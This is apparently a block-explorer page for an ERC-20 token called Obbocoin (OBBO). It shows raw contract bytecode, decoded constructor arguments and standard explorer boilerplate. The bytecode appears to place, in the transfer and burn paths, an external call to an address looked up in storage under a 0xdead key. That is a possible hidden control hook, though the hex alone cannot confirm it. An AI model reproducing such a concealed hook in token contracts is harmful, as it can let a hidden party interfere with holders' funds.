0000037a0000613d0000000001000019000006550001042e000000060000006b0000000001000019000002ac0000613d0000000301000029000000000101043300000006040000290000000302400210000001c30220027f000001c302200167000000000121016f0000000102400210000000000121019f000002cf0000013d000000010320008a0000000503300270000000000431001900000020030000390000000104400039000000020600002900000000056300190000000005050433000000000051041b00000020033000390000000101100039000000000041004b000002ba0000c13d000000060020006c000002cc0000813d00000006020000290000000302200210000000f80220018f000001c30220027f000001c30220016700000002033000290000000003030433000000000223016f000000000021041b0000000601000029000000010110021000000001011001bf0000000302000039000000000012041b00000005010000290000000001010433000600000001001d000001990010009c000000b60000213d0000000401000039000000000101041a000000010010019000000001021002700000007f0220618f000400000002001d0000001f0020008c00000000020000390000000102002039000000000121013f00000001001001900000017e0000c13d0000000401000029000000200010008c000003010000413d0000000401000039000000000010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019b011001c700008010020000390654064f0000040f00000001002001900000037a0000613d00000006030000290000001f023000390000000502200270000000200030008c0000000002004019000000000301043b00000004010000290000001f01100039000000050110027000000000011300190000000002230019000000000012004b000003010000813d000000000002041b0000000102200039000000000012004b000002fd0000413d00000006010000290000001f0010008c000003150000a13d0000000401000039000000000010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019b011001c700008010020000390654064f0000040f0000000100200190000000200200008a0000037a0000613d0000000602200180000000000101043b000003220000c13d00000020030000390000032f0000013d000000060000006b00000000010000190000031a0000613d0000000101000029000000000101043300000006040000290000000302400210000001c30220027f000001c302200167000000000121016f0000000102400210000000000121019f0000033d0000013d000000010320008a0000000503300270000000000431001900000020030000390000000104400039000000050600002900000000056300190000000005050433000000000051041b00000020033000390000000101100039000000000041004b000003280000c13d000000060020006c0000033a0000813d00000006020000290000000302200210000000f80220018f000001c30220027f000001c30220016700000005033000290000000003030433000000000223016f000000000021041b0000000601000029000000010110021000000001011001bf0000000402000039000000000012041b0000000001000411000000000001004b0000034c0000c13d000000400100043d000001a102000041000000000021043500000004021000390000000000020435000001960010009c00000196010080410000004001100210000001a2011001c700000656000104300000000201000039000000000201041a0000019c0220009c0000004a0000813d000000000021041b0000000001000411000000000010043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f00000001002001900000037a0000613d000000000101043b000000000201041a0000019c0220009a000000000021041b0000019e01000041000000400200043d0000000000120435000001960020009c000001960200804100000040012002100000000002000414000001960020009c0000019602008041000000c002200210000000000121019f0000019b011001c70000800d0200003900000003030000390000019f04000041000000000500001900000000060004110654064a0000040f00000001002001900000037a0000613d000000200100003900000100001004430000012000000443000001a001000041000006550001042e0000000001000019000006560001043000000020030000390000000004310436000000003202043400000000002404350000004001100039000000000002004b0000038b0000613d000000000400001900000000054100190000000006430019000000000606043300000000006504350000002004400039000000000024004b000003840000413d000000000321001900000000000304350000001f02200039000001c1022001970000000001210019000000000001042d0000001f02200039000001c1022001970000000001120019000000000021004b00000000020000390000000102004039000001990010009c0000039d0000213d00000001002001900000039d0000c13d000000400010043f000000000001042d000001a301000041000000000010043f0000004101000039000000040010043f000001a20100004100000656000104300000004005100039000000000045043500000020041000390000000000340435000001b20220019700000000002104350000006001100039000000000001042d0004000000000002000200000003001d000400000002001d000001b201100197000100000001001d000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000003f60000613d000000000101043b0000000402000029000001b202200197000300000002001d000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000003f60000613d0000000402000029000000000101043b000000000301041a000001c30030009c000003f50000613d0000000204000029000000000543004b000003f80000413d0000000101000029000000000001004b000004080000613d000400000005001d000000030000006b0000040b0000613d000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000003f60000613d000000000101043b0000000302000029000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000003f60000613d000000000101043b0000000402000029000000000021041b000000000001042d00000000010000190000065600010430000000400500043d000300000005001d000001c40100004100000000001504350000000401500039065403a30000040f00000003020000290000000001210049000001960010009c00000196010080410000006001100210000001960020009c00000196020080410000004002200210000000000121019f0000065600010430000000400100043d000001bf020000410000040d0000013d000000400100043d000001bd02000041000000000021043500000004021000390000000000020435000001960010009c00000196010080410000004001100210000001a2011001c700000656000104300006000000000002000500000003001d0000000003010019000601b20010019c000004fe0000613d000100000003001d000401b20020019c000005010000613d0000dead01000039000000000010043f0000000101000039000300000001001d000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b000001b602000041000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b000000000101041a000001b201100197000200000001001d000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b0000dead02000039000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b000000000101041a000000000001004b000004b30000613d000000400200043d000000840320003900000005040000290000000000430435000000640320003900000004040000290000000000430435000000440320003900000006040000290000000000430435000000e0031002100000002001200039000000000031043500000024032000390000000004000410000000000043043500000084030000390000000000320435000001c50020009c000004f80000813d000000c003200039000000400030043f000000000302043300000000040004140000000202000029000000040020008c000004780000c13d0000000001000031000000000001004b0000048b0000c13d000004b10000013d000001960010009c00000196010080410000004001100210000001960030009c00000196030080410000006003300210000000000113019f000001960040009c0000019604008041000000c003400210000000000131019f0654064a0000040f000300010020019300010000000103550000006001100270000001960010019d0000019601100197000000000001004b000004b10000613d0000001f03100039000001c1033001970000003f03300039000001c104300197000000400300043d0000000004430019000000000034004b00000000050000390000000105004039000001990040009c000004f80000213d0000000100500190000004f80000c13d000000400040043f0000000005130436000001c1021001980000001f0310018f00000000012500190000000104000367000004a40000613d000000000604034f000000006706043c0000000005750436000000000015004b000004a00000c13d000000000003004b000004b10000613d000000000224034f0000000303300210000000000401043300000000043401cf000000000434022f000000000202043b0000010003300089000000000232022f00000000023201cf000000000242019f0000000000210435000000030000006b0000051d0000613d0000000601000029000000000010043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b000000000301041a00030005003000740000050b0000413d0000000601000029000000000010043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b0000000302000029000000000021041b0000000401000029000000000010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000004f60000613d000000000101043b000000000201041a00000005030000290000000002320019000000000021041b000000400100043d0000000000310435000001960010009c000001960100804100000040011002100000000002000414000001960020009c0000019602008041000000c002200210000000000121019f0000019b011001c70000800d0200003900000003030000390000019f04000041000000060500002900000004060000290654064a0000040f0000000100200190000004f60000613d000000000001042d00000000010000190000065600010430000001a301000041000000000010043f0000004101000039000000040010043f000001a2010000410000065600010430000000400100043d000001ca02000041000005030000013d000000400100043d000001a102000041000000000021043500000004021000390000000000020435000001960010009c00000196010080410000004001100210000001a2011001c70000065600010430000000400200043d000600000002001d000001c9010000410000000000120435000000040120003900000001020000290000000504000029065403a30000040f00000006020000290000000001210049000001960010009c00000196010080410000006001100210000001960020009c00000196020080410000004002200210000000000121019f0000065600010430000000400100043d0000004402100039000001c603000041000000000032043500000024021000390000001f030000390000000000320435000001c7020000410000000000210435000000040210003900000020030000390000000000320435000001960010009c00000196010080410000004001100210000001c8011001c700000656000104300005000000000002000400000002001d000100000001001d000501b20010019c000006080000613d0000dead01000039000000000010043f0000000101000039000300000001001d000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b000001b602000041000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b000000000101041a000001b201100197000200000001001d000000000010043f0000000101000039000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b0000dead02000039000000000020043f000000200010043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b000000000101041a000000000001004b000005c80000613d000000400200043d000000840320003900000004040000290000000000430435000000440320003900000005040000290000000000430435000000e003100210000000200120003900000000003104350000002403200039000000000400041000000000004304350000008403000039000000000032043500000064032000390000000000030435000001c50020009c000006020000813d000000c003200039000000400030043f000000000302043300000000040004140000000202000029000000040020008c0000058d0000c13d0000000001000031000000000001004b000005a00000c13d000005c60000013d000001960010009c00000196010080410000004001100210000001960030009c00000196030080410000006003300210000000000113019f000001960040009c0000019604008041000000c003400210000000000131019f0654064a0000040f000300010020019300010000000103550000006001100270000001960010019d0000019601100197000000000001004b000005c60000613d0000001f03100039000001c1033001970000003f03300039000001c104300197000000400300043d0000000004430019000000000034004b00000000050000390000000105004039000001990040009c000006020000213d0000000100500190000006020000c13d000000400040043f0000000005130436000001c1021001980000001f0310018f00000000012500190000000104000367000005b90000613d000000000604034f000000006706043c0000000005750436000000000015004b000005b50000c13d000000000003004b000005c60000613d000000000224034f0000000303300210000000000401043300000000043401cf000000000434022f000000000202043b0000010003300089000000000232022f00000000023201cf000000000242019f0000000000210435000000030000006b000006240000613d0000000501000029000000000010043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b000000000301041a0003000400300074000006120000413d0000000501000029000000000010043f000000200000043f0000000001000414000001960010009c0000019601008041000000c0011002100000019d011001c700008010020000390654064f0000040f0000000100200190000006000000613d000000000101043b0000000302000029000000000021041b0000000201000039000000000201041a00000004030000290000000002320049000000000021041b000000400100043d0000000000310435000001960010009c000001960100804100000040011002100000000002000414000001960020009c0000019602008041000000c002200210000000000121019f0000019b011001c70000800d0200003900000003030000390000019f04000041000000050500002900000000060000190654064a0000040f0000000100200190000006000000613d000000000001042d00000000010000190000065600010430000001a301000041000000000010043f0000004101000039000000040010043f000001a2010000410000065600010430000000400100043d000001ca02000041000000000021043500000004021000390000000000020435000001960010009c00000196010080410000004001100210000001a2011001c70000065600010430000000400200043d000500000002001d000001c9010000410000000000120435000000040120003900000001020000290000000404000029065403a30000040f00000005020000290000000001210049000001960010009c00000196010080410000006001100210000001960020009c00000196020080410000004002200210000000000121019f0000065600010430000000400100043d0000004402100039000001c603000041000000000032043500000024021000390000001f030000390000000000320435000001c7020000410000000000210435000000040210003900000020030000390000000000320435000001960010009c00000196010080410000004001100210000001c8011001c70000065600010430000001960010009c00000196010080410000004001100210000001960020009c00000196020080410000006002200210000000000112019f0000000002000414000001960020009c0000019602008041000000c002200210000000000112019f000001cb011001c700008010020000390654064f0000040f0000000100200190000006480000613d000000000101043b000000000001042d000000000100001900000656000104300000064d002104210000000102000039000000000001042d0000000002000019000000000001042d00000652002104230000000102000039000000000001042d0000000002000019000000000001042d0000065400000432000006550001042e0000065600010430000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000001ffffffe000000000000000000000000000000000000000000000000000000000ffffffe0000000000000000000000000000000000000000000000000ffffffffffffffff80000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000020000000000000000000000000fffffffffffffffffffffffffffffffffffffff360d3632fb98b1215c00000000200000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000c9f2c9cd04674edea40000000ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef0000000200000000000000000000000000000040000001000000000000000000ec442f050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240000000000000000000000004e487b71000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000042966c670000000000000000000000000000000000000000000000000000000095d89b400000000000000000000000000000000000000000000000000000000095d89b4100000000000000000000000000000000000000000000000000000000a9059cbb00000000000000000000000000000000000000000000000000000000dd62ed3e0000000000000000000000000000000000000000000000000000000042966c680000000000000000000000000000000000000000000000000000000070a082310000000000000000000000000000000000000000000000000000000079cc67900000000000000000000000000000000000000000000000000000000018160ddc0000000000000000000000000000000000000000000000000000000018160ddd0000000000000000000000000000000000000000000000000000000023b872dd00000000000000000000000000000000000000000000000000000000313ce5670000000000000000000000000000000000000000000000000000000006fdde0300000000000000000000000000000000000000000000000000000000095ea7b3000000000000000000000000ffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000002000000080000000000000000000000000000000000000000000000000000000200000000000000000000000008a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36bd19b0000000000000000000000000000000000000000000000000000000019102024ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000d555555555555555555555555555555555555555555555555555555555555555d5555555555555555555555555555555555555555555555555555555555555562aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92594280d62000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024000000800000000000000000e602df0500000000000000000000000000000000000000000000000000000000c2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85bffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffb8f41b200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffff4045524332303a2055706461746520416c6c6f77616e6365204661696c6564210008c379a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064000000000000000000000000e450d38c0000000000000000000000000000000000000000000000000000000096c6fd1e00000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000027e016aae77c5523186b947877ed4b1946b87a2f0c34728d062ae96c0fec5bfc
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000084f62626f636f696e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044f42424f00000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Obbocoin
Arg [1] : symbol_ (string): OBBO
-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [3] : 4f62626f636f696e000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [5] : 4f42424f00000000000000000000000000000000000000000000000000000000
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.